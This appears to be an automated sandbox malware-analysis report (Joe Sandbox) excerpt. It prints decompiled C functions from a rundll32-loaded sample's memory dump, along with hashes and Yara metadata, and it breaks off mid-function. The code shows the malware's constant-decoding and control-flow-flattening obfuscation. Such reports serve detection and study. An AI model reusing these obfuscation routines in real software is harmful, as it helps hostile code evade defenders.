                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001743c2
                                                                                                                      0x00000000
                                                                                                                      0x001743d9
                                                                                                                      0x0017446d
                                                                                                                      0x00174471
                                                                                                                      0x0017447d
                                                                                                                      0x00174482
                                                                                                                      0x00174487
                                                                                                                      0x001744af
                                                                                                                      0x001744b5
                                                                                                                      0x001744c4
                                                                                                                      0x001744dc
                                                                                                                      0x001744e1
                                                                                                                      0x001744e4
                                                                                                                      0x001744e9
                                                                                                                      0x001744e9
                                                                                                                      0x001744e9
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: L\Z$/|$Tb
                                                                                                                      • API String ID: 0-3338791969
                                                                                                                      • Opcode ID: b328d1ea44c25b23725075258ecc3c8fdcc6c8ee9deda327bfcddd7c1ae4902c
                                                                                                                      • Instruction ID: 9a9f14717f8fe3790a941b1b8db081707bcd8299bd3e9f4d3f7d2d6429ca46de
                                                                                                                      • Opcode Fuzzy Hash: b328d1ea44c25b23725075258ecc3c8fdcc6c8ee9deda327bfcddd7c1ae4902c
                                                                                                                      • Instruction Fuzzy Hash: 46D1E0714083818FC768CF61C48A51FBBF1FBD4758F208A1DF2AA96260D7B58A49CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017F93D Relevance: 4.0, Strings: 3, Instructions: 239COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0017F93D() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				void* _t255;
				void* _t258;
				intOrPtr _t259;
				intOrPtr _t261;
				void* _t266;
				intOrPtr _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int* _t315;

				_t315 =  &_v1140;
				_v1056 = 0x7fa207;
				_v1052 = 0x3c49bf;
				_t266 = 0x35a8362;
				_t302 = 0;
				_v1048 = 0;
				_v1044 = 0;
				_v1060 = 0xe96fdd;
				_v1060 = _v1060 + 0xffff4dc5;
				_v1060 = _v1060 ^ 0x00e8fae7;
				_v1084 = 0x95aacc;
				_t303 = 0x76;
				_v1084 = _v1084 / _t303;
				_v1084 = _v1084 ^ 0x00004e07;
				_v1132 = 0x8ad3c0;
				_t304 = 0x3b;
				_v1132 = _v1132 / _t304;
				_t305 = 5;
				_v1132 = _v1132 / _t305;
				_t306 = 0x2e;
				_v1132 = _v1132 / _t306;
				_v1132 = _v1132 ^ 0x0002326f;
				_v1136 = 0x5025c5;
				_v1136 = _v1136 | 0xd1709035;
				_v1136 = _v1136 + 0xfffff598;
				_v1136 = _v1136 | 0xced027f9;
				_v1136 = _v1136 ^ 0xdffed43e;
				_v1076 = 0x8b6e07;
				_v1076 = _v1076 ^ 0x693ed631;
				_v1076 = _v1076 ^ 0x69bbe5bc;
				_v1096 = 0x201396;
				_v1096 = _v1096 ^ 0x88694b71;
				_v1096 = _v1096 + 0xffff467e;
				_v1096 = _v1096 ^ 0x884e23ab;
				_v1068 = 0x6d8c34;
				_v1068 = _v1068 ^ 0x91e2fcbf;
				_v1068 = _v1068 ^ 0x9185a139;
				_v1128 = 0x807b8c;
				_v1128 = _v1128 | 0x3609e9e3;
				_v1128 = _v1128 + 0xffff6ddf;
				_v1128 = _v1128 + 0xffffdf1a;
				_v1128 = _v1128 ^ 0x3687a3ab;
				_v1104 = 0xe6d4b9;
				_v1104 = _v1104 >> 0xd;
				_t307 = 0x48;
				_v1104 = _v1104 / _t307;
				_v1104 = _v1104 * 0x6c;
				_v1104 = _v1104 ^ 0x0006818d;
				_v1064 = 0xd65a00;
				_v1064 = _v1064 + 0x372a;
				_v1064 = _v1064 ^ 0x00dea864;
				_v1088 = 0x4d0087;
				_v1088 = _v1088 + 0xffffb4c7;
				_v1088 = _v1088 ^ 0x0a5aafbb;
				_v1088 = _v1088 ^ 0x0a1526df;
				_v1092 = 0x9c5ab3;
				_t308 = 0x3c;
				_v1092 = _v1092 / _t308;
				_v1092 = _v1092 >> 1;
				_v1092 = _v1092 ^ 0x000c3f19;
				_v1140 = 0x5b7912;
				_v1140 = _v1140 + 0xffff68b5;
				_t309 = 0x6d;
				_v1140 = _v1140 * 0xe;
				_v1140 = _v1140 >> 1;
				_v1140 = _v1140 ^ 0x02711af4;
				_v1120 = 0xf0336c;
				_v1120 = _v1120 + 0x850d;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 / _t309;
				_v1120 = _v1120 ^ 0x00151fd7;
				_v1112 = 0x1d5cd4;
				_v1112 = _v1112 << 7;
				_v1112 = _v1112 | 0x8feadd76;
				_v1112 = _v1112 << 0x10;
				_v1112 = _v1112 ^ 0xff743f21;
				_v1116 = 0x1a947a;
				_v1116 = _v1116 + 0x75f0;
				_v1116 = _v1116 << 0xa;
				_t310 = 0x5a;
				_v1116 = _v1116 * 0x6e;
				_v1116 = _v1116 ^ 0x79e60e9e;
				_v1124 = 0xbb349e;
				_v1124 = _v1124 / _t310;
				_v1124 = _v1124 << 8;
				_t311 = 0x54;
				_v1124 = _v1124 / _t311;
				_v1124 = _v1124 ^ 0x000c08c5;
				_v1080 = 0xb1ec11;
				_v1080 = _v1080 | 0x4ad04b34;
				_v1080 = _v1080 ^ 0x4af1877a;
				_v1072 = 0x6450ea;
				_v1072 = _v1072 ^ 0x5bd0ca6d;
				_v1072 = _v1072 ^ 0x5bbfa4d9;
				_v1100 = 0x193680;
				_v1100 = _v1100 + 0xffff84f1;
				_t312 = 0x39;
				_v1100 = _v1100 / _t312;
				_v1100 = _v1100 ^ 0x185ca7c1;
				_v1100 = _v1100 ^ 0x1855126a;
				_v1108 = 0xe40e26;
				_v1108 = _v1108 + 0xffff805f;
				_v1108 = _v1108 << 4;
				_v1108 = _v1108 ^ 0x0e3caf6d;
				do {
					while(_t266 != 0x35a8362) {
						if(_t266 == 0x706ecca) {
							E0018E498(_v1072, _v1100, _v1108,  &_v1040);
						} else {
							if(_t266 == 0xd630330) {
								_push( &_v520);
								_push( &_v1040);
								_push(_v1080);
								_t255 = E00178D95(_v1116, _v1124, __eflags);
								_t315 =  &(_t315[3]);
								__eflags = _t255;
								_t302 =  !=  ? 1 : _t302;
								_t266 = 0x706ecca;
								continue;
							} else {
								if(_t266 == 0xdb8f695) {
									E001912A8(_t266, _v1060, __eflags, _v1084, _v1132,  &_v520);
									_t315 =  &(_t315[3]);
									_t266 = 0xe8d55c7;
									continue;
								} else {
									_t322 = _t266 - 0xe8d55c7;
									if(_t266 != 0xe8d55c7) {
										goto L10;
									} else {
										_push(_v1068);
										_push(_v1096);
										_push(0x1710cc);
										_t258 = E0017AB66(_v1136, _v1076, _t322);
										_t259 =  *0x19520c; // 0x0
										_t261 =  *0x19520c; // 0x0
										E0017E7CE(_t258, _t322, _v1128, _t261 + 8, _v1136, _v1104, _v1064, _v1088, _v1092, _t259 + 0x220);
										E0017AE03(_v1140, _v1120, _v1112, _t258);
										_t315 =  &(_t315[0xd]);
										_t266 = 0xd630330;
										continue;
									}
								}
							}
						}
						L13:
						return _t302;
					}
					_t266 = 0xdb8f695;
					L10:
					__eflags = _t266 - 0x3cedcca;
				} while (__eflags != 0);
				goto L13;
			}















































                                                                                                                      0x0017f93d
                                                                                                                      0x0017f943
                                                                                                                      0x0017f94d
                                                                                                                      0x0017f955
                                                                                                                      0x0017f95e
                                                                                                                      0x0017f960
                                                                                                                      0x0017f964
                                                                                                                      0x0017f968
                                                                                                                      0x0017f970
                                                                                                                      0x0017f978
                                                                                                                      0x0017f980
                                                                                                                      0x0017f98e
                                                                                                                      0x0017f993
                                                                                                                      0x0017f999
                                                                                                                      0x0017f9a1
                                                                                                                      0x0017f9ad
                                                                                                                      0x0017f9b2
                                                                                                                      0x0017f9bc
                                                                                                                      0x0017f9c1
                                                                                                                      0x0017f9cb
                                                                                                                      0x0017f9d0
                                                                                                                      0x0017f9d6
                                                                                                                      0x0017f9de
                                                                                                                      0x0017f9e6
                                                                                                                      0x0017f9ee
                                                                                                                      0x0017f9f6
                                                                                                                      0x0017f9fe
                                                                                                                      0x0017fa06
                                                                                                                      0x0017fa0e
                                                                                                                      0x0017fa16
                                                                                                                      0x0017fa1e
                                                                                                                      0x0017fa26
                                                                                                                      0x0017fa2e
                                                                                                                      0x0017fa36
                                                                                                                      0x0017fa3e
                                                                                                                      0x0017fa46
                                                                                                                      0x0017fa4e
                                                                                                                      0x0017fa56
                                                                                                                      0x0017fa5e
                                                                                                                      0x0017fa66
                                                                                                                      0x0017fa6e
                                                                                                                      0x0017fa76
                                                                                                                      0x0017fa7e
                                                                                                                      0x0017fa86
                                                                                                                      0x0017fa8f
                                                                                                                      0x0017fa92
                                                                                                                      0x0017fa9b
                                                                                                                      0x0017fa9f
                                                                                                                      0x0017faa7
                                                                                                                      0x0017faaf
                                                                                                                      0x0017fab7
                                                                                                                      0x0017fabf
                                                                                                                      0x0017fac7
                                                                                                                      0x0017facf
                                                                                                                      0x0017fad7
                                                                                                                      0x0017fadf
                                                                                                                      0x0017faf4
                                                                                                                      0x0017faf9
                                                                                                                      0x0017faff
                                                                                                                      0x0017fb08
                                                                                                                      0x0017fb10
                                                                                                                      0x0017fb18
                                                                                                                      0x0017fb25
                                                                                                                      0x0017fb28
                                                                                                                      0x0017fb2c
                                                                                                                      0x0017fb30
                                                                                                                      0x0017fb38
                                                                                                                      0x0017fb40
                                                                                                                      0x0017fb48
                                                                                                                      0x0017fb55
                                                                                                                      0x0017fb59
                                                                                                                      0x0017fb61
                                                                                                                      0x0017fb69
                                                                                                                      0x0017fb6e
                                                                                                                      0x0017fb76
                                                                                                                      0x0017fb7b
                                                                                                                      0x0017fb83
                                                                                                                      0x0017fb8b
                                                                                                                      0x0017fb93
                                                                                                                      0x0017fb9d
                                                                                                                      0x0017fba0
                                                                                                                      0x0017fba4
                                                                                                                      0x0017fbac
                                                                                                                      0x0017fbbc
                                                                                                                      0x0017fbc0
                                                                                                                      0x0017fbc9
                                                                                                                      0x0017fbce
                                                                                                                      0x0017fbd4
                                                                                                                      0x0017fbdc
                                                                                                                      0x0017fbe4
                                                                                                                      0x0017fbec
                                                                                                                      0x0017fbf4
                                                                                                                      0x0017fbfc
                                                                                                                      0x0017fc04
                                                                                                                      0x0017fc0c
                                                                                                                      0x0017fc14
                                                                                                                      0x0017fc20
                                                                                                                      0x0017fc23
                                                                                                                      0x0017fc27
                                                                                                                      0x0017fc2f
                                                                                                                      0x0017fc37
                                                                                                                      0x0017fc47
                                                                                                                      0x0017fc4f
                                                                                                                      0x0017fc54
                                                                                                                      0x0017fc5c
                                                                                                                      0x0017fc5c
                                                                                                                      0x0017fc6e
                                                                                                                      0x0017fd78
                                                                                                                      0x0017fc74
                                                                                                                      0x0017fc7a
                                                                                                                      0x0017fd2b
                                                                                                                      0x0017fd30
                                                                                                                      0x0017fd31
                                                                                                                      0x0017fd3d
                                                                                                                      0x0017fd44
                                                                                                                      0x0017fd48
                                                                                                                      0x0017fd4a
                                                                                                                      0x0017fd4d
                                                                                                                      0x00000000
                                                                                                                      0x0017fc80
                                                                                                                      0x0017fc82
                                                                                                                      0x0017fd15
                                                                                                                      0x0017fd1a
                                                                                                                      0x0017fd1d
                                                                                                                      0x00000000
                                                                                                                      0x0017fc84
                                                                                                                      0x0017fc84
                                                                                                                      0x0017fc86
                                                                                                                      0x00000000
                                                                                                                      0x0017fc8c
                                                                                                                      0x0017fc8c
                                                                                                                      0x0017fc90
                                                                                                                      0x0017fc9c
                                                                                                                      0x0017fca1
                                                                                                                      0x0017fcab
                                                                                                                      0x0017fcc8
                                                                                                                      0x0017fcdd
                                                                                                                      0x0017fcef
                                                                                                                      0x0017fcf4
                                                                                                                      0x0017fcf7
                                                                                                                      0x00000000
                                                                                                                      0x0017fcf7
                                                                                                                      0x0017fc86
                                                                                                                      0x0017fc82
                                                                                                                      0x0017fc7a
                                                                                                                      0x0017fd7f
                                                                                                                      0x0017fd8b
                                                                                                                      0x0017fd8b
                                                                                                                      0x0017fd57
                                                                                                                      0x0017fd59
                                                                                                                      0x0017fd59
                                                                                                                      0x0017fd59
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *7$Pd$6
                                                                                                                      • API String ID: 0-2172486832
                                                                                                                      • Opcode ID: bc86d0a15e28c9728bd8a82dc965b103912d59004410dc4cfc07c8461bbef795
                                                                                                                      • Instruction ID: 4d7ac505ac071bc92dd241f070fa85dbc24daa910bfe3fa088f1a1093dfb3959
                                                                                                                      • Opcode Fuzzy Hash: bc86d0a15e28c9728bd8a82dc965b103912d59004410dc4cfc07c8461bbef795
                                                                                                                      • Instruction Fuzzy Hash: 27B122B15083409BD354CF66C88994FFBF1FBC8758F508A1DF69A86260D7B58909CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00178D95 Relevance: 3.9, Strings: 3, Instructions: 194COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 75%
                                                                                                                      			E00178D95(void* __ecx, void* __edx, void* __eflags) {
				void* _t231;
				signed int _t261;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				void* _t269;
				intOrPtr* _t290;
				void* _t291;

				_t290 = _t291 - 0x6c;
				_push( *((intOrPtr*)(_t290 + 0x7c)));
				_push( *((intOrPtr*)(_t290 + 0x78)));
				_push( *((intOrPtr*)(_t290 + 0x74)));
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t231);
				 *(_t290 + 8) =  *(_t290 + 8) & 0x00000000;
				 *_t290 = 0x81872b;
				 *((intOrPtr*)(_t290 + 4)) = 0xdf4fac;
				 *(_t290 + 0x2c) = 0x807aaf;
				_t265 = 0x3e;
				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) * 0x66;
				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) >> 0xc;
				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) ^ 0x0003330f;
				 *(_t290 + 0x50) = 0x6f2162;
				 *(_t290 + 0x50) =  *(_t290 + 0x50) >> 4;
				 *(_t290 + 0x50) =  *(_t290 + 0x50) * 0x62;
				 *(_t290 + 0x50) =  *(_t290 + 0x50) + 0xffffa9e2;
				 *(_t290 + 0x50) =  *(_t290 + 0x50) ^ 0x02a8505a;
				 *(_t290 + 0x58) = 0xe574ec;
				 *(_t290 + 0x58) =  *(_t290 + 0x58) + 0x326d;
				 *(_t290 + 0x58) =  *(_t290 + 0x58) ^ 0x9da0d68a;
				 *(_t290 + 0x58) =  *(_t290 + 0x58) + 0xbde6;
				 *(_t290 + 0x58) =  *(_t290 + 0x58) ^ 0x9d4627b9;
				 *(_t290 + 0x20) = 0xd3956a;
				 *(_t290 + 0x20) =  *(_t290 + 0x20) * 0x24;
				 *(_t290 + 0x20) =  *(_t290 + 0x20) ^ 0x1dc1e5a2;
				 *(_t290 + 0x14) = 0xfcd290;
				 *(_t290 + 0x14) =  *(_t290 + 0x14) >> 0x10;
				 *(_t290 + 0x14) =  *(_t290 + 0x14) ^ 0x00095bca;
				 *(_t290 + 0x64) = 0x85109;
				 *(_t290 + 0x64) =  *(_t290 + 0x64) | 0x78e3fbb1;
				 *(_t290 + 0x64) =  *(_t290 + 0x64) + 0xffffa60f;
				 *(_t290 + 0x64) =  *(_t290 + 0x64) | 0x3bc8e61c;
				 *(_t290 + 0x64) =  *(_t290 + 0x64) ^ 0x7bee7ea1;
				 *(_t290 + 0x3c) = 0x71f5e0;
				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) >> 3;
				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) + 0xebfe;
				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) ^ 0x0002c43f;
				 *(_t290 + 0x28) = 0x899f0e;
				 *(_t290 + 0x28) =  *(_t290 + 0x28) + 0x8a6f;
				 *(_t290 + 0x28) =  *(_t290 + 0x28) ^ 0x0089e2c7;
				 *(_t290 + 0x54) = 0x38c331;
				 *(_t290 + 0x54) =  *(_t290 + 0x54) / _t265;
				 *(_t290 + 0x54) =  *(_t290 + 0x54) ^ 0x1d97b6ad;
				_t266 = 0x30;
				 *(_t290 + 0x54) =  *(_t290 + 0x54) / _t266;
				 *(_t290 + 0x54) =  *(_t290 + 0x54) ^ 0x0098c8d2;
				 *(_t290 + 0x38) = 0xd05f1;
				 *(_t290 + 0x38) =  *(_t290 + 0x38) >> 7;
				 *(_t290 + 0x38) =  *(_t290 + 0x38) << 0xf;
				 *(_t290 + 0x38) =  *(_t290 + 0x38) ^ 0x0d051a45;
				 *(_t290 + 0x30) = 0x1cfed4;
				 *(_t290 + 0x30) =  *(_t290 + 0x30) >> 0x10;
				 *(_t290 + 0x30) =  *(_t290 + 0x30) ^ 0xc4190834;
				 *(_t290 + 0x30) =  *(_t290 + 0x30) ^ 0xc41fa725;
				 *(_t290 + 0x40) = 0x1c7373;
				 *(_t290 + 0x40) =  *(_t290 + 0x40) * 0x75;
				 *(_t290 + 0x40) =  *(_t290 + 0x40) << 0xc;
				 *(_t290 + 0x40) =  *(_t290 + 0x40) ^ 0x0c3b1071;
				 *(_t290 + 0x18) = 0x2a4c72;
				 *(_t290 + 0x18) =  *(_t290 + 0x18) >> 0xe;
				 *(_t290 + 0x18) =  *(_t290 + 0x18) ^ 0x00012640;
				 *(_t290 + 0x4c) = 0xadab42;
				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) + 0xc082;
				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) ^ 0x0f040eb7;
				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) | 0xc54ebe7a;
				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) ^ 0xcfe19c3b;
				 *(_t290 + 0x5c) = 0x1c041c;
				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) + 0x881f;
				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) + 0xa114;
				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) << 2;
				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) ^ 0x007200ac;
				 *(_t290 + 0x44) = 0x9cf7da;
				 *(_t290 + 0x44) =  *(_t290 + 0x44) | 0xc9a894cc;
				_t267 = 3;
				 *(_t290 + 0x44) =  *(_t290 + 0x44) * 0xa;
				 *(_t290 + 0x44) =  *(_t290 + 0x44) ^ 0xe16343df;
				 *(_t290 + 0x60) = 0x461ba6;
				_t268 = 0xd;
				 *(_t290 + 0x60) =  *(_t290 + 0x60) / _t267;
				 *(_t290 + 0x60) =  *(_t290 + 0x60) + 0x5831;
				 *(_t290 + 0x60) =  *(_t290 + 0x60) ^ 0xab0fd2ba;
				 *(_t290 + 0x60) =  *(_t290 + 0x60) ^ 0xab16638d;
				 *(_t290 + 0x68) = 0x8d460c;
				 *(_t290 + 0x68) =  *(_t290 + 0x68) * 0x3f;
				 *(_t290 + 0x68) =  *(_t290 + 0x68) + 0x2d22;
				 *(_t290 + 0x68) =  *(_t290 + 0x68) / _t268;
				 *(_t290 + 0x68) =  *(_t290 + 0x68) ^ 0x02a3ee27;
				 *(_t290 + 0x34) = 0x2e04ca;
				 *(_t290 + 0x34) =  *(_t290 + 0x34) | 0xfffff3f9;
				 *(_t290 + 0x34) =  *(_t290 + 0x34) ^ 0xfffa6071;
				 *(_t290 + 0x10) = 0xbf0768;
				 *(_t290 + 0x10) =  *(_t290 + 0x10) + 0xffff288c;
				 *(_t290 + 0x10) =  *(_t290 + 0x10) ^ 0x00be6359;
				 *(_t290 + 0xc) = 0xd072fa;
				 *(_t290 + 0xc) =  *(_t290 + 0xc) << 1;
				 *(_t290 + 0xc) =  *(_t290 + 0xc) ^ 0x01aa1a0e;
				 *(_t290 + 0x1c) = 0x9f8a7b;
				 *(_t290 + 0x1c) =  *(_t290 + 0x1c) ^ 0xfb0eca93;
				 *(_t290 + 0x1c) =  *(_t290 + 0x1c) ^ 0xfb998053;
				 *(_t290 + 0x24) = 0xd784f2;
				 *(_t290 + 0x24) =  *(_t290 + 0x24) << 5;
				 *(_t290 + 0x24) =  *(_t290 + 0x24) ^ 0x1afc882d;
				 *(_t290 + 0x48) = 0xfdbd11;
				 *(_t290 + 0x48) =  *(_t290 + 0x48) ^ 0xbb0d2ead;
				 *(_t290 + 0x48) =  *(_t290 + 0x48) >> 0xa;
				 *(_t290 + 0x48) =  *(_t290 + 0x48) + 0xffffcd0b;
				 *(_t290 + 0x48) =  *(_t290 + 0x48) ^ 0x002ef0f8;
				_push( *(_t290 + 0x3c));
				_push( *(_t290 + 0x64));
				_push( *(_t290 + 0x14));
				_push( *(_t290 + 0x20));
				_t269 = 0x1e;
				E00191310(_t269, _t290 - 0x20);
				E00191310(0x208, _t290 - 0x228,  *(_t290 + 0x28),  *(_t290 + 0x54),  *(_t290 + 0x38),  *(_t290 + 0x30));
				E00191310(0x208, _t290 - 0x430,  *(_t290 + 0x40),  *(_t290 + 0x18),  *(_t290 + 0x4c),  *(_t290 + 0x5c));
				E001808A0( *((intOrPtr*)(_t290 + 0x7c)),  *(_t290 + 0x44),  *(_t290 + 0x60), _t290 - 0x228,  *(_t290 + 0x68));
				E001808A0( *((intOrPtr*)(_t290 + 0x78)),  *(_t290 + 0x34),  *(_t290 + 0x10), _t290 - 0x430,  *(_t290 + 0xc));
				 *(_t290 - 0x1c) =  *(_t290 + 0x2c);
				 *((intOrPtr*)(_t290 - 0x18)) = _t290 - 0x228;
				 *((intOrPtr*)(_t290 - 0x14)) = _t290 - 0x430;
				 *((short*)(_t290 - 0x10)) =  *(_t290 + 0x58) |  *(_t290 + 0x50) | 0x00000410;
				_t261 = E0018E2C5( *(_t290 + 0x1c),  *(_t290 + 0x24),  *(_t290 + 0x48), _t290 - 0x20);
				asm("sbb eax, eax");
				return  ~_t261 + 1;
			}












                                                                                                                      0x00178d96
                                                                                                                      0x00178da0
                                                                                                                      0x00178da3
                                                                                                                      0x00178da6
                                                                                                                      0x00178da9
                                                                                                                      0x00178daa
                                                                                                                      0x00178dab
                                                                                                                      0x00178db0
                                                                                                                      0x00178db6
                                                                                                                      0x00178dbd
                                                                                                                      0x00178dc4
                                                                                                                      0x00178dd1
                                                                                                                      0x00178dd4
                                                                                                                      0x00178dd7
                                                                                                                      0x00178ddb
                                                                                                                      0x00178de2
                                                                                                                      0x00178de9
                                                                                                                      0x00178df1
                                                                                                                      0x00178df4
                                                                                                                      0x00178dfb
                                                                                                                      0x00178e02
                                                                                                                      0x00178e09
                                                                                                                      0x00178e10
                                                                                                                      0x00178e17
                                                                                                                      0x00178e1e
                                                                                                                      0x00178e25
                                                                                                                      0x00178e30
                                                                                                                      0x00178e33
                                                                                                                      0x00178e3a
                                                                                                                      0x00178e41
                                                                                                                      0x00178e45
                                                                                                                      0x00178e4c
                                                                                                                      0x00178e53
                                                                                                                      0x00178e5a
                                                                                                                      0x00178e61
                                                                                                                      0x00178e68
                                                                                                                      0x00178e6f
                                                                                                                      0x00178e76
                                                                                                                      0x00178e7a
                                                                                                                      0x00178e81
                                                                                                                      0x00178e88
                                                                                                                      0x00178e8f
                                                                                                                      0x00178e96
                                                                                                                      0x00178e9d
                                                                                                                      0x00178eab
                                                                                                                      0x00178eae
                                                                                                                      0x00178eb8
                                                                                                                      0x00178ebb
                                                                                                                      0x00178ebe
                                                                                                                      0x00178ec5
                                                                                                                      0x00178ecc
                                                                                                                      0x00178ed0
                                                                                                                      0x00178ed4
                                                                                                                      0x00178edb
                                                                                                                      0x00178ee2
                                                                                                                      0x00178ee6
                                                                                                                      0x00178eed
                                                                                                                      0x00178ef4
                                                                                                                      0x00178eff
                                                                                                                      0x00178f02
                                                                                                                      0x00178f06
                                                                                                                      0x00178f0d
                                                                                                                      0x00178f14
                                                                                                                      0x00178f18
                                                                                                                      0x00178f1f
                                                                                                                      0x00178f26
                                                                                                                      0x00178f2d
                                                                                                                      0x00178f34
                                                                                                                      0x00178f3b
                                                                                                                      0x00178f42
                                                                                                                      0x00178f49
                                                                                                                      0x00178f52
                                                                                                                      0x00178f59
                                                                                                                      0x00178f5d
                                                                                                                      0x00178f64
                                                                                                                      0x00178f6b
                                                                                                                      0x00178f78
                                                                                                                      0x00178f7b
                                                                                                                      0x00178f7e
                                                                                                                      0x00178f85
                                                                                                                      0x00178f91
                                                                                                                      0x00178f92
                                                                                                                      0x00178f97
                                                                                                                      0x00178f9e
                                                                                                                      0x00178fa5
                                                                                                                      0x00178fac
                                                                                                                      0x00178fb7
                                                                                                                      0x00178fba
                                                                                                                      0x00178fc9
                                                                                                                      0x00178fcc
                                                                                                                      0x00178fd3
                                                                                                                      0x00178fda
                                                                                                                      0x00178fe1
                                                                                                                      0x00178fe8
                                                                                                                      0x00178fef
                                                                                                                      0x00178ff6
                                                                                                                      0x00178ffd
                                                                                                                      0x00179004
                                                                                                                      0x00179007
                                                                                                                      0x0017900e
                                                                                                                      0x00179015
                                                                                                                      0x0017901c
                                                                                                                      0x00179023
                                                                                                                      0x0017902a
                                                                                                                      0x0017902e
                                                                                                                      0x00179035
                                                                                                                      0x0017903c
                                                                                                                      0x00179043
                                                                                                                      0x00179047
                                                                                                                      0x0017904e
                                                                                                                      0x00179055
                                                                                                                      0x00179058
                                                                                                                      0x0017905b
                                                                                                                      0x0017905e
                                                                                                                      0x00179063
                                                                                                                      0x00179064
                                                                                                                      0x00179080
                                                                                                                      0x0017909c
                                                                                                                      0x001790b7
                                                                                                                      0x001790cf
                                                                                                                      0x001790d7
                                                                                                                      0x001790e0
                                                                                                                      0x001790e9
                                                                                                                      0x001790f7
                                                                                                                      0x00179108
                                                                                                                      0x00179112
                                                                                                                      0x00179119

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: b!o$rL*$t
                                                                                                                      • API String ID: 0-1909624753
                                                                                                                      • Opcode ID: 08792196a01ec6f0438129d1e16b46a7bb7c069241e3f29c323c54d08d570b65
                                                                                                                      • Instruction ID: 8ec35f4904c74569715fadaa7e1edfbe23c9f025a8fe1cb21128c914c2a62c1c
                                                                                                                      • Opcode Fuzzy Hash: 08792196a01ec6f0438129d1e16b46a7bb7c069241e3f29c323c54d08d570b65
                                                                                                                      • Instruction Fuzzy Hash: 73B1DB7140038D9BDF59DF61C98A9CE3BB2FF54348F108219FA1A96260D7B5CA99CF84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017B41A Relevance: 3.9, Strings: 3, Instructions: 155COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E0017B41A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				unsigned int _v56;
				signed int _v60;
				void* _t125;
				void* _t136;
				intOrPtr _t140;
				void* _t146;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				void* _t163;
				signed int* _t166;

				_push(1);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(1);
				_push(__ecx);
				E0017CF25(_t125);
				_v56 = 0xe46139;
				_t166 =  &(( &_v60)[7]);
				_v56 = _v56 + 0x2728;
